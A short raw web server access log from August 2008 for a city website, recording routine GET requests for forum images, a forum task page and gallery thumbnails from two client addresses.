203.177.74.139 - - [28/Aug/2008:05:16:59 -0700] "GET /forum2/style_images/red_crysta/folder_editor_images/rte_tile.gif HTTP/1.1" 304 - "http://www.sancarloscity.org/forum2/index.php?showtopic=233" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
120.28.140.12 - - [28/Aug/2008:05:16:59 -0700] "GET /sampo/thumbs/1.jpg HTTP/1.1" 200 14152 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "sancarloscity.org"
203.177.74.139 - - [28/Aug/2008:05:17:01 -0700] "GET /forum2/index.php?act=task HTTP/1.1" 200 59 "http://www.sancarloscity.org/forum2/index.php?showtopic=233" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
120.28.140.12 - - [28/Aug/2008:05:17:01 -0700] "GET /sampo/thumbs/2.jpg HTTP/1.1" 200 14432 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "sancarloscity.org"
120.28.140.12 - - [28/Aug/2008:05:17:02 -0700] "GET /sampo/thumbs/3.jpg HTTP/1.1" 200 14357 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "sancarloscity.org"
